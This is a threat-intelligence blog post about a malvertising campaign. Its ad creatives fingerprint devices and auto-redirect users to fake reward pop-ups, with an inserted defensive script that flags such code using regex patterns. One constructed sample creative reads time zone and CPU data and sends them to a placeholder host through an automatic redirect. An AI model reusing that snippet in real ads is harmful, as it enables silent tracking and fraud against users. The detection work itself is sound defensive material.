Active Threats - Oct. 17, 2022

Posted

October 17, 2022

Active Threats

Over the past 3 months, we have been closely monitoring a malicious redirect campaign that automatically redirects users to random fake reward pop-ups without any user interaction.

Malicious advertisements




Major malware tactics used

Device fingerprinting

Malicious behavior 

The threat actor has created a group of several malvertising campaigns that follow the same attack and execution pattern. The first-stage malicious JavaScript code is hardcoded inside the creative markup. When the creative executes, the malicious code executes simultaneously in the background without any user interaction.


This time the first-stage malicious JavaScript loader isn't obfuscated, which makes it easy for malware researchers to debug and understand the malicious code flow. The loader has multiple functions to collect user device information, and the threat actor uses it to create a unique, long second-stage malicious JavaScript URL, which automatically redirects the end user and deceives them by showing fake Walmart/Google search reward pop-ups. Sometimes, based on geolocation, the user gets redirected to multiple fake adult dating websites too.
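
Because the loader is unobfuscated, the combination described above (device reads such as time zone and CPU, followed by an automatic top-level redirect with no click) can be triaged statically in creative markup. The following is an added example, not code from the campaign or from the original post; the regexes, function names and sample creatives are assumptions constructed for illustration.

```javascript
// Added example: static triage of ad-creative markup (heuristic, not a sandbox).
// Signal names and regexes below are assumptions chosen for this illustration.
const FINGERPRINT_READS = {
  timezone: /resolvedOptions\(\)\s*\.timeZone|getTimezoneOffset\s*\(/,
  cpu: /navigator\s*\.\s*hardwareConcurrency/,
  screen: /screen\s*\.\s*(width|height|colorDepth)/,
  platform: /navigator\s*\.\s*(platform|userAgent)/,
};
// Navigation sinks that move the top-level page, not just the ad iframe.
const NAV_SINK = /(top|parent)\s*\.\s*location(\s*\.\s*href)?\s*=(?!=)|(top|parent)\s*\.\s*location\s*\.\s*(replace|assign)\s*\(/;
// Evidence that navigation is tied to a user gesture (legitimate click-through).
const USER_GESTURE = /addEventListener\s*\(\s*['"](click|touchend|pointerup)['"]|\bonclick\s*=/i;

function extractInlineScripts(markup) {
  const scripts = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(markup)) !== null) {
    if (m[1].trim()) scripts.push(m[1]);
  }
  return scripts;
}

function triageCreative(markup) {
  const code = extractInlineScripts(markup).join("\n");
  const fingerprint = Object.keys(FINGERPRINT_READS)
    .filter((name) => FINGERPRINT_READS[name].test(code));
  const navigatesTop = NAV_SINK.test(code);
  const gestureBound = USER_GESTURE.test(code);
  // Flag only the combination the write-up describes: device data is read and
  // the top-level page is navigated with no click handler anywhere in the script.
  const suspicious = fingerprint.length >= 2 && navigatesTop && !gestureBound;
  return { fingerprint, navigatesTop, gestureBound, suspicious };
}

// Constructed samples (not taken from the campaign); example.invalid is a placeholder.
const SAMPLE_AUTO = `<div><img src="banner.png"></div><script>
  var tz = Intl.DateTimeFormat().resolvedOptions().timeZone;
  var cpu = navigator.hardwareConcurrency;
  top.location.href = "https://example.invalid/r?tz=" + encodeURIComponent(tz) + "&c=" + cpu;
</script>`;
const SAMPLE_CLICK = `<a id="cta"><img src="banner.png"></a><script>
  document.getElementById("cta").addEventListener("click", function () {
    top.location.href = "https://example.invalid/landing";
  });
</script>`;

console.log(triageCreative(SAMPLE_AUTO), triageCreative(SAMPLE_CLICK));
```

A regex pass like this only works on unobfuscated inline code such as the loader described here; creatives that pull script from external URLs or encode their logic need dynamic scanning instead.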


Sample malicious JavaScript function that collects user timezone location and CPU information.


Malicious landing pages


 

